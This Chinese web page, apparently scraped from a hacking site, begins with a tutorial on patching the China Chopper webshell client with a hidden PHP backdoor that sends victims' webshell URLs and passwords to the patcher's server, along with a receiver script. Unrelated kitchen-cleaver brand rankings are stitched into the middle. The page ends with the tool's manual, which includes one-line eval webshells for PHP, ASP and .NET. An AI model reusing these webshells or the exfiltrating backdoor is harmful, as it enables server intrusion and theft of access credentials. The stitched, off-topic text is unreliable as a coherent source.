渗透工具中国菜刀,渗透 工具
作者:hacker | 分类:入侵网站 | 浏览:116 | 日期:2022年07月17日目录:
如何给中国菜刀添加隐蔽后门
1、后门如何触发
这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。
当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图
当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。
2、菜刀脱壳
在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。
3、查看数据包,分析流程(右键-编辑)
本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,
数据如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D
一共有3个参数,
a url解码后为@eval (base64_decode($_POST[z0]));
z0先url解码,在base64解码为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();
Z1先url解码,在base64解码为
C:\\wamp\\www\\robots.txt
稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。
4、使用OD分析
使用OD打开中国菜刀,右键搜索字符串,结果如下:
定位到php读取文的字符串处,点击进去到代码处
可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。
5、修改菜刀程序文件
由上可知,字符串的地址为0x49ba94,查看内存数据,
发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。
这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。
将后门字符串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
放到文件841d0处
打开010editor 将上述字符串复制到010editor中,
由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换
使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,
保存文件,这样后门字符串就被我们添加到程序中了。
6、使用OD修改程序代码
用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。
0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下
保存修改的文件即可。
7、测试修改结果
修改文件后,我们在看看菜刀-右键编辑,抓到数据包
Z0解密后为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();
可见我们的后门代码也一起被发送到服务端执行了。
编写加单的getx.php接收结果,
getx.php:
?php
$getx = $_GET["caidao"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?
结果如下:
8、后记
通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。
什么牌子的菜刀好 中国菜刀十大品牌排行榜
菜刀是我们每个家庭必备的厨房用具之一,或许我们平时不会去注意它的品牌,觉得能切菜就好。其实,这小小的一把菜刀,也能给我们的生活提供诸多便利。什么牌子的菜刀好?菜刀品牌有哪些?如果您还不清楚的话,那就跟随小编来普及一下这方面的知识吧。
NO.1 阳江十八子作
阳江十八子集团有限公司,十大刀具品牌,中国驰名商标,广东省著名商标,广东省名牌,行业领导品牌,中国刀王,国家重点高新技术企业,全方位经营的综合大型品牌企业。
NO.2 钻石
株洲钻石切削刀具股份有限公司,数控刀具十大品牌,更受欢迎的国产刀具品牌之一,株洲硬质合金集团有限公司旗下企业,我国更大和更先进的高性能切削刀具的生产基地之一。
NO.3 张小泉
杭州张小泉实业发展有限公司,刀具-厨房日用刀具十大品牌,始于1663年,中国驰名商标,中华老字号,我国手工业的传统名牌,其传统锻造技艺被国务院认定为非物质文化遗产重点保护,国内制剪行业龙头企业。
NO.4 双立人
上海双立人亨克斯有限公司,高压锅十大品牌,刀具十大品牌,十大美甲修容工具品牌,历史上最古老的商标之一,全球知名品牌,美甲行业的领先地位,大型跨国公司。
NO.5 苏泊尔
浙江苏泊尔股份有限公司,苏泊尔SUPOR,电压力锅十大品牌,十大小家电品牌,中国驰名商标,中国厨房小家电领先品牌,中国更大的炊具研发制造商之一,中国压力锅行业标准的起草者和最早执行者,国内炊具行业首家上市公司。
NO.6 王麻子
北京栎昌王麻子工贸有限公司,刀具十大品牌,始于1651年,中华老字号,国家级非物质文化遗产,中国传统刀剪业代表企业,国家轻工产品更高质量奖银质奖,全国刀具优秀供应商,致力于刀具生产和销售专业厂家。
NO.7 巧媳妇
阳江市巧媳妇厨业有限公司,刀具十大品牌,广东省著名商标,广东省名牌产品,中国刀剪知名品牌,国内刀剪餐厨具行业更具知名度和美誉度的知名品牌之一,广东省高新技术企业,集五金刀剪和餐厨具制品设计开发、生产制造、销售服务于一体的综合性企业。
NO.8 楼龙
浙江楼龙工贸有限公司,中国知名保温杯品牌,金华市百家质量信的过单位,浙江省工商企业守合同重信用单位,一家集杯业、刀业、门业、餐饮业、旅游业等五大产业为一体的多元化大型企业。
NO.9 银鹰
广东银鹰实业集团有限公司,刀具十大品牌,广东省著名商标,广东省名牌产品,广东省高新技术企业,专业生产剪刀、套刀、厨具、多用钳等产品的先进民营科技企业。
NO.10 永光
永光刀剪集团有限公司,知名(著名)刀具品牌,中国驰名商标,广东省著名商标,广东省名牌,行业知名品牌,全国出口创汇先进乡镇企业,国刀剪行业规模较大、技术力量较雄厚的企业之一。
世界知名刀具品牌:山特维克,瓦尔特, 伊斯卡,三菱,东芝,可乐满,肯纳,山高住友,蓝帜,泰柯珞,黛杰,玛帕MAPAL,蒂泰克斯Titex,日立刀具
国内知名刀具品牌:哈工,上工,成量,哈尔滨工量数控,自贡,文翔,盛达刀具
附:菜刀选购要点
1、看材质:从材质上看,菜刀分为铁刀、不锈钢刀、铁夹钢刀、纯钢刀。其各自的特点是纯钢刀易崩刃、铁刀易卷刃、不锈钢刀磨不快,而铁夹钢刀的质量更好。所谓铁夹钢刀,就是刀的中间层为钢质,两面为薄薄的铁质层。
2、看刃口:菜刀的开刃方式分为机器开刃和手工开刃,所以单就锋利度而言,钢材硬度更高的,刃口度数更小的,刃口部位弧度更柔和而非线性直降的菜刀会更快,更好用。好的菜刀的刃口一定是直平的,无缺口的。
3、看手柄:在刀柄方面主要材质有木质,工程塑料、钢柄等,各有优点。通常来说冲压成型的菜刀刀柄做的更好用更精致;好的菜刀手柄必须具有良好的抗冲击强度和表面硬度,有比较好的尺寸和稳定性,其次还要有一定的耐化学药品性和良好的电气绝缘性,再者,就是握感要好,光滑亮丽不伤手,有防滑设计。
以上资料由土巴兔装修网小编为您整理,菜刀排名不分先后,信息内容仅供参考。如需了解更多家居生活知识,请持续关注土巴兔装修网。
中国菜刀排行榜是什么?
阳江十八子集团有限公司,刀具十大品牌,始于1983年,广东省著名商标,广东名牌产品,高新技术企业,以手工生产碳钢菜刀起家,现为综合性的刀具产家
上海双立人亨克斯有限公司,始于1731年德国,享誉全球的家用及专业刀具品牌,专业高档厨房用具品牌/美甲及发剪生产商, “S”和四星系列刀具广受欢迎
杭州张小泉集团有限公司,始于1663年,中华老字号,我国手工业的传统名牌,其传统锻造技艺被国务院认定为非物质文化遗产,国内制剪行业领先企业
北京栎昌王麻子工贸有限公司,始于1651年,其传统锻制技艺入选非物质文化遗产,主要从事系列刀具的生产、销售的现代化企业
浙江苏泊尔股份有限公司,成立于1994年,压力锅行业标准起草单位,大型炊具研发制造商,安全压力锅/球釜IH饭煲/无涂层不锈技术享誉市场
浙江爱仕达电器股份有限公司,创于1978年,厨具十大品牌,浙江著名商标,浙江名牌产品,民族炊具品牌,高新技术企业,大型炊具和厨房小家电供应商
福建永德利刀剪有限公司,源于1735年,福建省著名商标,专业制造刀剪集贸易与加工为一体的先进民营企业,国内实力雄厚的刀剪生产企业,以工艺精湛、造型美观的刀剪产品享誉世界
阳江市巧媳妇厨业有限公司,广东省著名商标,广东名牌,国内刀剪餐厨具行业极具知名度和美誉度的品牌,高新技术企业,集五金刀剪和餐厨具制品设计开发、生产制造、销售服务于一体的综合性企业
京瓷株式会社,京瓷(中国)商贸有限公司,KYOCERA京瓷,始创于1959年日本,世界500强企业,主要从事办公设备、电子元器件和切削工具等的生产、销售的大型跨国公司
广东银鹰实业集团有限公司,刀具十大品牌,始建于1979年,广东省著名商标,广东名牌,专业生产剪刀/套刀/厨具/多用钳等产品的先进民营科技企业
锻打工艺:这个主要是重庆大足那边的刀采用的如“邓家刀”五代传承,是锻打刀的引领者,锻打刀的特点就是锋利、持久、好用,缺点是外观不够新颖时尚,为实用型。
冲胚工艺:这个是把钢材直接用机器冷轧成型,然后开刃制造成刀,因为机器成型所以外观比较好设计,产量大,但其缺点是用钝后不好磨,磨不快成废品几率大,这个主要是广东阳江这边的品牌如:十八子作、巧媳妇等都是非常有名的,
材料:目前菜刀的主流材料是:3cr13、4CR13、5cr15mov、9cr15mov含碳量越高硬度越高,加工难度相对较大,菜刀就越锋利持久。
中国菜刀的功能介绍:
只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
UINCODE方式编译,支持多国语言输入显示。
一、EVAL客户端部分
1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。
支持的服务端脚本:PHP, ASP,NET。
在服务端运行的代码如下:
PHP: ?php @eval($_POST['pass']);?
ASP: %eval request(pass)%
.NET: %@ Page Language=Jscript%%eval(Request.Item[pass],unsafe);%
(注意: .NET要单独一个文件或此文件也是Jscript语言)
2)怎么用
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接 *** 请点击数据库管理界面左上角处的配置按钮查看)
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 关于配置信息怎么填?
A) 数据库方面:
PHP脚本:
T类型/T 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
H主机地址H 主机地址可为机器名或IP地址,如localhost
U数据库用户/U 连接数据库的用户名,如root
P数据库密码/P 连接数据库的密码,如123455
ASP和.NET脚本:
T类型/T 类型只能填ADO
CADO配置信息/C
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass']);}
Oaction=test/O
提交功能前先POST额外的数据包:会话期间只提交一次。
DATAuid=user1pwd=123456/DATA
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP,更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb
把菜刀的数据库db.mdb替换掉即可。